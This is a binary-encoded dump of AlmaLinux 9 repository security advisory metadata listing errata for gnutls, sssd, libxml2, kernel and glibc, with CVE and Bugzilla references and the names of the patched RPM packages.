��cBsecurityModerate: gnutls security update,��"�https://access.redhat.com/errata/RHSA-2024:2570RHSA-2024:2570RHSA-2024:2570https://access.redhat.com/security/cve/CVE-2024-28834CVE-2024-28834CVE-2024-28834https://access.redhat.com/security/cve/CVE-2024-28835CVE-2024-28835CVE-2024-28835https://bugzilla.redhat.com/22690842269084https://bugzilla.redhat.com/22692282269228https://errata.almalinux.org/9/ALSA-2024-2570.htmlALSA-2024:2570ALSA-2024:2570�#�gnutls-3.8.3-4.el9_4.x86_64.rpm�#�gnutls-3.8.3-4.el9_4.i686.rpm�#�gnutls-3.8.3-4.el9_4.x86_64.rpm�#�gnutls-3.8.3-4.el9_4.i686.rpm���A�L
��fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: sssd security and bug fix update,��3�Hhttps://access.redhat.com/errata/RHSA-2024:2571RHSA-2024:2571RHSA-2024:2571https://access.redhat.com/security/cve/CVE-2023-3758CVE-2023-3758CVE-2023-3758https://bugzilla.redhat.com/22237622223762https://errata.almalinux.org/9/ALSA-2024-2571.htmlALSA-2024:2571ALSA-2024:2571#�|#python3-sssdconfig-2.9.4-6.el9_4.noarch.rpm�*#libipa_hbac-2.9.4-6.el9_4.x86_64.rpm�5#sssd-client-2.9.4-6.el9_4.i686.rpm�y#python3-libsss_nss_idmap-2.9.4-6.el9_4.x86_64.rpm�#sssd-common-2.9.4-6.el9_4.x86_64.rpm�#sssd-2.9.4-6.el9_4.x86_64.rpm�{#python3-sss-murmur-2.9.4-6.el9_4.x86_64.rpm�0#libsss_simpleifp-2.9.4-6.el9_4.x86_64.rpm�#sssd-ad-2.9.4-6.el9_4.x86_64.rpm�
#sssd-proxy-2.9.4-6.el9_4.x86_64.rpm�#sssd-krb5-common-2.9.4-6.el9_4.x86_64.rpm�0#libsss_simpleifp-2.9.4-6.el9_4.i686.rpm�#sssd-passkey-2.9.4-6.el9_4.x86_64.rpm�#sssd-tools-2.9.4-6.el9_4.x86_64.rpm�/#libsss_nss_idmap-2.9.4-6.el9_4.x86_64.rpm�#sssd-dbus-2.9.4-6.el9_4.x86_64.rpm�*#libipa_hbac-2.9.4-6.el9_4.i686.rpm�-#libsss_certmap-2.9.4-6.el9_4.i686.rpm�#sssd-common-pac-2.9.4-6.el9_4.x86_64.rpm�x#python3-libipa_hbac-2.9.4-6.el9_4.x86_64.rpm�	#sssd-ldap-2.9.4-6.el9_4.x86_64.rpm�#sssd-kcm-2.9.4-6.el9_4.x86_64.rpm�.#libsss_idmap-2.9.4-6.el9_4.i686.rpm�q#libsss_sudo-2.9.4-6.el9_4.x86_64.rpm�#sssd-winbind-idmap-2.9.4-6.el9_4.x86_64.rpm�#sssd-polkit-rules-2.9.4-6.el9_4.x86_64.rpm�p#libsss_autofs-2.9.4-6.el9_4.x86_64.rpm�#sssd-ipa-2.9.4-6.el9_4.x86_64.rpm�#sssd-krb5-2.9.4-6.el9_4.x86_64.rpm�-#libsss_certmap-2.9.4-6.el9_4.x86_64.rpm�
#sssd-nfs-idmap-2.9.4-6.el9_4.x86_64.rpm�5#sssd-client-2.9.4-6.el9_4.x86_64.rpm�.#libsss_idmap-2.9.4-6.el9_4.x86_64.rpm�z#python3-sss-2.9.4-6.el9_4.x86_64.rpm�/#libsss_nss_idmap-2.9.4-6.el9_4.i686.rpm#�|#python3-sssdconfig-2.9.4-6.el9_4.noarch.rpm�*#libipa_hbac-2.9.4-6.el9_4.x86_64.rpm�5#sssd-client-2.9.4-6.el9_4.i686.rpm�y#python3-libsss_nss_idmap-2.9.4-6.el9_4.x86_64.rpm�#sssd-common-2.9.4-6.el9_4.x86_64.rpm�#sssd-2.9.4-6.el9_4.x86_64.rpm�{#python3-sss-murmur-2.9.4-6.el9_4.x86_64.rpm�0#libsss_simpleifp-2.9.4-6.el9_4.x86_64.rpm�#sssd-ad-2.9.4-6.el9_4.x86_64.rpm�
#sssd-proxy-2.9.4-6.el9_4.x86_64.rpm�#sssd-krb5-common-2.9.4-6.el9_4.x86_64.rpm�0#libsss_simpleifp-2.9.4-6.el9_4.i686.rpm�#sssd-passkey-2.9.4-6.el9_4.x86_64.rpm�#sssd-tools-2.9.4-6.el9_4.x86_64.rpm�/#libsss_nss_idmap-2.9.4-6.el9_4.x86_64.rpm�#sssd-dbus-2.9.4-6.el9_4.x86_64.rpm�*#libipa_hbac-2.9.4-6.el9_4.i686.rpm�-#libsss_certmap-2.9.4-6.el9_4.i686.rpm�#sssd-common-pac-2.9.4-6.el9_4.x86_64.rpm�x#python3-libipa_hbac-2.9.4-6.el9_4.x86_64.rpm�	#sssd-ldap-2.9.4-6.el9_4.x86_64.rpm�#sssd-kcm-2.9.4-6.el9_4.x86_64.rpm�.#libsss_idmap-2.9.4-6.el9_4.i686.rpm�q#libsss_sudo-2.9.4-6.el9_4.x86_64.rpm�#sssd-winbind-idmap-2.9.4-6.el9_4.x86_64.rpm�#sssd-polkit-rules-2.9.4-6.el9_4.x86_64.rpm�p#libsss_autofs-2.9.4-6.el9_4.x86_64.rpm�#sssd-ipa-2.9.4-6.el9_4.x86_64.rpm�#sssd-krb5-2.9.4-6.el9_4.x86_64.rpm�-#libsss_certmap-2.9.4-6.el9_4.x86_64.rpm�
#sssd-nfs-idmap-2.9.4-6.el9_4.x86_64.rpm�5#sssd-client-2.9.4-6.el9_4.x86_64.rpm�.#libsss_idmap-2.9.4-6.el9_4.x86_64.rpm�z#python3-sss-2.9.4-6.el9_4.x86_64.rpm�/#libsss_nss_idmap-2.9.4-6.el9_4.i686.rpm���#�M
��eBBBsecurityModerate: libxml2 security update,��{�nhttps://access.redhat.com/errata/RHSA-2024:2679RHSA-2024:2679RHSA-2024:2679https://access.redhat.com/security/cve/CVE-2024-25062CVE-2024-25062CVE-2024-25062https://bugzilla.redhat.com/22627262262726https://errata.almalinux.org/9/ALSA-2024-2679.htmlALSA-2024:2679ALSA-2024:2679�O�python3-libxml2-2.9.13-6.el9_4.x86_64.rpm��libxml2-2.9.13-6.el9_4.x86_64.rpm��libxml2-2.9.13-6.el9_4.i686.rpm�O�python3-libxml2-2.9.13-6.el9_4.x86_64.rpm��libxml2-2.9.13-6.el9_4.x86_64.rpm��libxml2-2.9.13-6.el9_4.i686.rpm����k�N
��jBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security and bug fix update,��i�&https://access.redhat.com/errata/RHSA-2024:2758RHSA-2024:2758RHSA-2024:2758https://bugzilla.redhat.com/22508432250843https://bugzilla.redhat.com/22708362270836https://errata.almalinux.org/9/ALSA-2024-2758.htmlALSA-2024:2758ALSA-2024:2758https://www.redhat.com/security/data/cve/CVE-2023-5090.htmlCVE-2023-5090CVE-2023-5090https://www.redhat.com/security/data/cve/CVE-2023-6240.htmlCVE-2023-6240CVE-2023-6240https://www.redhat.com/security/data/cve/CVE-2024-25742.htmlCVE-2024-25742CVE-2024-25742https://www.redhat.com/security/data/cve/CVE-2024-25743.htmlCVE-2024-25743CVE-2024-25743Dkernel-debug-modules-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-modules-extra-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-abi-stablelists-5.14.0-427.16.1.el9_4.noarch.rpmDkernel-5.14.0-427.16.1.el9_4.x86_64.rpm2Dpython3-perf-5.14.0-427.16.1.el9_4.x86_64.rpm1�>bpftool-7.3.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-core-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-modules-5.14.0-427.16.1.el9_4.x86_64.rpm!Dkernel-modules-core-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-tools-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-tools-libs-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-modules-extra-5.14.0-427.16.1.el9_4.x86_64.rpm"Dkernel-uki-virt-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-modules-core-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-core-5.14.0-427.16.1.el9_4.x86_64.rpm Dkernel-debug-uki-virt-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-modules-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-modules-extra-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-abi-stablelists-5.14.0-427.16.1.el9_4.noarch.rpmDkernel-5.14.0-427.16.1.el9_4.x86_64.rpm2Dpython3-perf-5.14.0-427.16.1.el9_4.x86_64.rpm1�>bpftool-7.3.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-core-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-modules-5.14.0-427.16.1.el9_4.x86_64.rpm!Dkernel-modules-core-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-tools-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-tools-libs-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-modules-extra-5.14.0-427.16.1.el9_4.x86_64.rpm"Dkernel-uki-virt-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-modules-core-5.14.0-427.16.1.el9_4.x86_64.rpmDkernel-debug-core-5.14.0-427.16.1.el9_4.x86_64.rpm Dkernel-debug-uki-virt-5.14.0-427.16.1.el9_4.x86_64.rpm����t�O
��KBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security and bug fix update,���xhttps://access.redhat.com/errata/RHSA-2024:3306RHSA-2024:3306RHSA-2024:3306https://bugzilla.redhat.com/22708792270879https://bugzilla.redhat.com/22708812270881https://bugzilla.redhat.com/22728162272816https://bugzilla.redhat.com/22734232273423https://errata.almalinux.org/9/ALSA-2024-3306.htmlALSA-2024:3306ALSA-2024:3306https://www.redhat.com/security/data/cve/CVE-2024-26642.htmlCVE-2024-26642CVE-2024-26642https://www.redhat.com/security/data/cve/CVE-2024-26643.htmlCVE-2024-26643CVE-2024-26643https://www.redhat.com/security/data/cve/CVE-2024-26673.htmlCVE-2024-26673CVE-2024-26673https://www.redhat.com/security/data/cve/CVE-2024-26804.htmlCVE-2024-26804CVE-2024-26804https://www.redhat.com/security/data/cve/CVE-2024-35890.htmlCVE-2024-35890CVE-2024-35890Ekernel-modules-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-tools-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-modules-core-5.14.0-427.18.1.el9_4.x86_64.rpm"Ekernel-uki-virt-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-modules-extra-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-abi-stablelists-5.14.0-427.18.1.el9_4.noarch.rpmEkernel-debug-core-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-core-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-5.14.0-427.18.1.el9_4.x86_64.rpm Ekernel-debug-uki-virt-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-modules-extra-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-modules-5.14.0-427.18.1.el9_4.x86_64.rpm!Ekernel-modules-core-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-tools-libs-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-5.14.0-427.18.1.el9_4.x86_64.rpm2Epython3-perf-5.14.0-427.18.1.el9_4.x86_64.rpm1�?bpftool-7.3.0-427.18.1.el9_4.x86_64.rpmEkernel-modules-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-tools-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-modules-core-5.14.0-427.18.1.el9_4.x86_64.rpm"Ekernel-uki-virt-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-modules-extra-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-abi-stablelists-5.14.0-427.18.1.el9_4.noarch.rpmEkernel-debug-core-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-core-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-5.14.0-427.18.1.el9_4.x86_64.rpm Ekernel-debug-uki-virt-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-modules-extra-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-debug-modules-5.14.0-427.18.1.el9_4.x86_64.rpm!Ekernel-modules-core-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-tools-libs-5.14.0-427.18.1.el9_4.x86_64.rpmEkernel-5.14.0-427.18.1.el9_4.x86_64.rpm2Epython3-perf-5.14.0-427.18.1.el9_4.x86_64.rpm1�?bpftool-7.3.0-427.18.1.el9_4.x86_64.rpm����"�P
� �lBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: glibc security update,'���https://access.redhat.com/errata/RHSA-2024:3339RHSA-2024:3339RHSA-2024:3339https://access.redhat.com/security/cve/CVE-2024-2961CVE-2024-2961CVE-2024-2961https://access.redhat.com/security/cve/CVE-2024-33599CVE-2024-33599CVE-2024-33599https://access.redhat.com/security/cve/CVE-2024-33600CVE-2024-33600CVE-2024-33600https://access.redhat.com/security/cve/CVE-2024-33601CVE-2024-33601CVE-2024-33601https://access.redhat.com/security/cve/CVE-2024-33602CVE-2024-33602CVE-2024-33602https://bugzilla.redhat.com/22734042273404https://bugzilla.redhat.com/22772022277202https://bugzilla.redhat.com/22772042277204https://bugzilla.redhat.com/22772052277205https://bugzilla.redhat.com/22772062277206https://errata.almalinux.org/9/ALSA-2024-3339.htmlALSA-2024:3339ALSA-2024:3339�P�glibc-langpack-pl-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ar-2.34-100.el9_4.2.x86_64.rpm�"glibc-langpack-sd-2.34-100.el9_4.2.x86_64.rpm�aglibc-langpack-kab-2.34-100.el9_4.2.x86_64.rpm�Eglibc-langpack-fur-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mnw-2.34-100.el9_4.2.x86_64.rpm�?glibc-langpack-fa-2.34-100.el9_4.2.x86_64.rpm�1glibc-langpack-sv-2.34-100.el9_4.2.x86_64.rpm�2glibc-langpack-cy-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-be-2.34-100.el9_4.2.x86_64.rpm�Wnscd-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-agr-2.34-100.el9_4.2.x86_64.rpm�7glibc-langpack-tg-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ber-2.34-100.el9_4.2.x86_64.rpm�Lglibc-langpack-wae-2.34-100.el9_4.2.x86_64.rpm�-glibc-langpack-cmn-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ms-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ro-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-pa-2.34-100.el9_4.2.x86_64.rpm�cglibc-langpack-kl-2.34-100.el9_4.2.x86_64.rpm�sglibc-langpack-lv-2.34-100.el9_4.2.x86_64.rpm�8glibc-langpack-th-2.34-100.el9_4.2.x86_64.rpm�rglibc-langpack-lt-2.34-100.el9_4.2.x86_64.rpm�*glibc-langpack-ce-2.34-100.el9_4.2.x86_64.rpm�$glibc-langpack-sgs-2.34-100.el9_4.2.x86_64.rpm�[glibc-langpack-ik-2.34-100.el9_4.2.x86_64.rpm� glibc-langpack-bhb-2.34-100.el9_4.2.x86_64.rpm�5glibc-langpack-tcy-2.34-100.el9_4.2.x86_64.rpm�`glibc-langpack-ka-2.34-100.el9_4.2.x86_64.rpm�Mglibc-langpack-ha-2.34-100.el9_4.2.x86_64.rpm�Fglibc-langpack-unm-2.34-100.el9_4.2.x86_64.rpm�(glibc-langpack-sid-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-niu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-aa-2.34-100.el9_4.2.x86_64.rpm�=glibc-langpack-et-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mt-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ast-2.34-100.el9_4.2.x86_64.rpm�Wglibc-langpack-hy-2.34-100.el9_4.2.x86_64.rpm�5glibc-langpack-doi-2.34-100.el9_4.2.x86_64.rpm�Oglibc-langpack-xh-2.34-100.el9_4.2.x86_64.rpm�Dglibc-langpack-fr-2.34-100.el9_4.2.x86_64.rpm�glibc-common-2.34-100.el9_4.2.x86_64.rpm�!glibc-langpack-sc-2.34-100.el9_4.2.x86_64.rpm�Sglibc-langpack-hr-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-oc-2.34-100.el9_4.2.x86_64.rpm�Nglibc-langpack-hak-2.34-100.el9_4.2.x86_64.rpm�fglibc-langpack-ko-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-am-2.34-100.el9_4.2.x86_64.rpm�kglibc-langpack-ky-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-anp-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-sa-2.34-100.el9_4.2.x86_64.rpm�9glibc-langpack-the-2.34-100.el9_4.2.x86_64.rpm�Pglibc-langpack-hi-2.34-100.el9_4.2.x86_64.rpm�mglibc-langpack-lg-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mni-2.34-100.el9_4.2.x86_64.rpm�nglibc-langpack-li-2.34-100.el9_4.2.x86_64.rpm�$glibc-langpack-bo-2.34-100.el9_4.2.x86_64.rpm�8glibc-langpack-dz-2.34-100.el9_4.2.x86_64.rpm�~glibc-langpack-ml-2.34-100.el9_4.2.x86_64.rpm�Eglibc-langpack-uk-2.34-100.el9_4.2.x86_64.rpm�Kglibc-langpack-wa-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-az-2.34-100.el9_4.2.x86_64.rpm�Iglibc-langpack-ve-2.34-100.el9_4.2.x86_64.rpm�/glibc-langpack-cs-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-rw-2.34-100.el9_4.2.x86_64.rpm�(glibc-langpack-byn-2.34-100.el9_4.2.x86_64.rpm�,glibc-2.34-100.el9_4.2.x86_64.rpm�xglibc-langpack-mg-2.34-100.el9_4.2.x86_64.rpm�6glibc-langpack-te-2.34-100.el9_4.2.x86_64.rpm�|glibc-langpack-mjw-2.34-100.el9_4.2.x86_64.rpm�Yglibc-langpack-id-2.34-100.el9_4.2.x86_64.rpm�Pglibc-langpack-yi-2.34-100.el9_4.2.x86_64.rpm�Qglibc-langpack-hif-2.34-100.el9_4.2.x86_64.rpm�/libnsl-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-my-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ps-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nds-2.34-100.el9_4.2.x86_64.rpm�Rglibc-langpack-yue-2.34-100.el9_4.2.x86_64.rpm�:glibc-langpack-en-2.34-100.el9_4.2.x86_64.rpm�pglibc-langpack-ln-2.34-100.el9_4.2.x86_64.rpm�#glibc-langpack-bn-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nso-2.34-100.el9_4.2.x86_64.rpm�&glibc-langpack-brx-2.34-100.el9_4.2.x86_64.rpm�@glibc-langpack-tpi-2.34-100.el9_4.2.x86_64.rpm�Uglibc-langpack-ht-2.34-100.el9_4.2.x86_64.rpm�
glibc-langpack-nhn-2.34-100.el9_4.2.x86_64.rpm�3glibc-langpack-szl-2.34-100.el9_4.2.x86_64.rpm�qglibc-langpack-lo-2.34-100.el9_4.2.x86_64.rpm�Tglibc-langpack-zh-2.34-100.el9_4.2.x86_64.rpm�)glibc-langpack-ca-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nr-2.34-100.el9_4.2.x86_64.rpm�%glibc-langpack-shn-2.34-100.el9_4.2.x86_64.rpm�4glibc-langpack-ta-2.34-100.el9_4.2.x86_64.rpm�eglibc-langpack-kn-2.34-100.el9_4.2.x86_64.rpm�}glibc-langpack-mk-2.34-100.el9_4.2.x86_64.rpm�>glibc-langpack-eu-2.34-100.el9_4.2.x86_64.rpm�<glibc-langpack-es-2.34-100.el9_4.2.x86_64.rpm�\glibc-langpack-is-2.34-100.el9_4.2.x86_64.rpm�<glibc-langpack-tk-2.34-100.el9_4.2.x86_64.rpm�jglibc-langpack-kw-2.34-100.el9_4.2.x86_64.rpm�'glibc-langpack-si-2.34-100.el9_4.2.x86_64.rpm�6glibc-langpack-dsb-2.34-100.el9_4.2.x86_64.rpm�Gglibc-langpack-ga-2.34-100.el9_4.2.x86_64.rpm�:glibc-langpack-ti-2.34-100.el9_4.2.x86_64.rpm�!glibc-langpack-bho-2.34-100.el9_4.2.x86_64.rpm�4glibc-langpack-de-2.34-100.el9_4.2.x86_64.rpm�+glibc-langpack-chr-2.34-100.el9_4.2.x86_64.rpm�Hglibc-langpack-gd-2.34-100.el9_4.2.x86_64.rpm�bglibc-langpack-kk-2.34-100.el9_4.2.x86_64.rpm�%glibc-langpack-br-2.34-100.el9_4.2.x86_64.rpm�glibc-all-langpacks-2.34-100.el9_4.2.x86_64.rpm�gglibc-langpack-kok-2.34-100.el9_4.2.x86_64.rpm�,glibc-langpack-ckb-2.34-100.el9_4.2.x86_64.rpm�{glibc-langpack-miq-2.34-100.el9_4.2.x86_64.rpm�Zglibc-langpack-ig-2.34-100.el9_4.2.x86_64.rpm�Jglibc-langpack-vi-2.34-100.el9_4.2.x86_64.rpm�2glibc-langpack-sw-2.34-100.el9_4.2.x86_64.rpm�Aglibc-langpack-fi-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ru-2.34-100.el9_4.2.x86_64.rpm�?glibc-langpack-to-2.34-100.el9_4.2.x86_64.rpm�0glibc-langpack-csb-2.34-100.el9_4.2.x86_64.rpm�*glibc-langpack-sl-2.34-100.el9_4.2.x86_64.rpm�Rglibc-langpack-hne-2.34-100.el9_4.2.x86_64.rpm�Uglibc-langpack-zu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-raj-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-bem-2.34-100.el9_4.2.x86_64.rpm�Vglibc-langpack-hu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-sah-2.34-100.el9_4.2.x86_64.rpm�/glibc-langpack-ss-2.34-100.el9_4.2.x86_64.rpm�Qglibc-langpack-yo-2.34-100.el9_4.2.x86_64.rpm�Cglibc-langpack-tt-2.34-100.el9_4.2.x86_64.rpm�yglibc-langpack-mhr-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-om-2.34-100.el9_4.2.x86_64.rpm�Jglibc-langpack-gl-2.34-100.el9_4.2.x86_64.rpm�@glibc-langpack-ff-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-af-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nb-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ayc-2.34-100.el9_4.2.x86_64.rpm�hglibc-langpack-ks-2.34-100.el9_4.2.x86_64.rpm� glibc-langpack-sat-2.34-100.el9_4.2.x86_64.rpm�Gglibc-langpack-ur-2.34-100.el9_4.2.x86_64.rpm�3glibc-langpack-da-2.34-100.el9_4.2.x86_64.rpm�,glibc-langpack-so-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nl-2.34-100.el9_4.2.x86_64.rpm�Vglibc-minimal-langpack-2.34-100.el9_4.2.x86_64.rpm�]glibc-langpack-it-2.34-100.el9_4.2.x86_64.rpm�Bglibc-langpack-fil-2.34-100.el9_4.2.x86_64.rpm�'glibc-langpack-bs-2.34-100.el9_4.2.x86_64.rpm�,glibc-2.34-100.el9_4.2.i686.rpm�#glibc-langpack-se-2.34-100.el9_4.2.x86_64.rpm�Cglibc-langpack-fo-2.34-100.el9_4.2.x86_64.rpm�/libnsl-2.34-100.el9_4.2.i686.rpm�-glibc-gconv-extra-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-pt-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-nan-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-an-2.34-100.el9_4.2.x86_64.rpm�Sglibc-langpack-yuw-2.34-100.el9_4.2.x86_64.rpm�>glibc-langpack-tn-2.34-100.el9_4.2.x86_64.rpm�Kglibc-langpack-gu-2.34-100.el9_4.2.x86_64.rpm�Hglibc-langpack-uz-2.34-100.el9_4.2.x86_64.rpm�vglibc-langpack-mai-2.34-100.el9_4.2.x86_64.rpm�.glibc-langpack-sr-2.34-100.el9_4.2.x86_64.rpm�wglibc-langpack-mfe-2.34-100.el9_4.2.x86_64.rpm�Iglibc-langpack-gez-2.34-100.el9_4.2.x86_64.rpm�;glibc-langpack-eo-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-as-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mn-2.34-100.el9_4.2.x86_64.rpm�Fglibc-langpack-fy-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ak-2.34-100.el9_4.2.x86_64.rpm�Dglibc-langpack-ug-2.34-100.el9_4.2.x86_64.rpm�_glibc-langpack-ja-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-bg-2.34-100.el9_4.2.x86_64.rpm�-glibc-gconv-extra-2.34-100.el9_4.2.i686.rpm�oglibc-langpack-lij-2.34-100.el9_4.2.x86_64.rpm�1glibc-langpack-cv-2.34-100.el9_4.2.x86_64.rpm�0glibc-langpack-st-2.34-100.el9_4.2.x86_64.rpm�Tglibc-langpack-hsb-2.34-100.el9_4.2.x86_64.rpm�"glibc-langpack-bi-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-quz-2.34-100.el9_4.2.x86_64.rpm�Nglibc-langpack-wo-2.34-100.el9_4.2.x86_64.rpm�zglibc-langpack-mi-2.34-100.el9_4.2.x86_64.rpm�9glibc-langpack-el-2.34-100.el9_4.2.x86_64.rpm�tglibc-langpack-lzh-2.34-100.el9_4.2.x86_64.rpm�^glibc-langpack-iu-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-pap-2.34-100.el9_4.2.x86_64.rpm�Aglibc-langpack-tr-2.34-100.el9_4.2.x86_64.rpm�;glibc-langpack-tig-2.34-100.el9_4.2.x86_64.rpm�.glibc-langpack-crh-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-os-2.34-100.el9_4.2.x86_64.rpm�7glibc-langpack-dv-2.34-100.el9_4.2.x86_64.rpm�Xglibc-langpack-ia-2.34-100.el9_4.2.x86_64.rpm�
glibc-langpack-nn-2.34-100.el9_4.2.x86_64.rpm�Lglibc-langpack-gv-2.34-100.el9_4.2.x86_64.rpm�Mglibc-langpack-wal-2.34-100.el9_4.2.x86_64.rpm�Oglibc-langpack-he-2.34-100.el9_4.2.x86_64.rpm�	glibc-langpack-ne-2.34-100.el9_4.2.x86_64.rpm�+glibc-langpack-sm-2.34-100.el9_4.2.x86_64.rpm�Bglibc-langpack-ts-2.34-100.el9_4.2.x86_64.rpm�=glibc-langpack-tl-2.34-100.el9_4.2.x86_64.rpm�-glibc-langpack-sq-2.34-100.el9_4.2.x86_64.rpm�uglibc-langpack-mag-2.34-100.el9_4.2.x86_64.rpm�dglibc-langpack-km-2.34-100.el9_4.2.x86_64.rpm�lglibc-langpack-lb-2.34-100.el9_4.2.x86_64.rpm�iglibc-langpack-ku-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-or-2.34-100.el9_4.2.x86_64.rpm�&glibc-langpack-shs-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mr-2.34-100.el9_4.2.x86_64.rpm�)glibc-langpack-sk-2.34-100.el9_4.2.x86_64.rpm�P�glibc-langpack-pl-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ar-2.34-100.el9_4.2.x86_64.rpm�"glibc-langpack-sd-2.34-100.el9_4.2.x86_64.rpm�aglibc-langpack-kab-2.34-100.el9_4.2.x86_64.rpm�Eglibc-langpack-fur-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-mnw-2.34-100.el9_4.2.x86_64.rpm�?glibc-langpack-fa-2.34-100.el9_4.2.x86_64.rpm�1glibc-langpack-sv-2.34-100.el9_4.2.x86_64.rpm�2glibc-langpack-cy-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-be-2.34-100.el9_4.2.x86_64.rpm�Wnscd-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-agr-2.34-100.el9_4.2.x86_64.rpm�7glibc-langpack-tg-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ber-2.34-100.el9_4.2.x86_64.rpm�Lglibc-langpack-wae-2.34-100.el9_4.2.x86_64.rpm�-glibc-langpack-cmn-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ms-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-ro-2.34-100.el9_4.2.x86_64.rpm�glibc-langpack-pa-2.34-100.el9_4.2.x86_64.rpm�cglibc-langpack-kl-2.34-100.el9_4.2.x86_64.rpm�sglibc-langpack-lv-2.34-100.el9_4.2.x86_64.rpm�8glibc-langpack-th-2.34-100.el9_4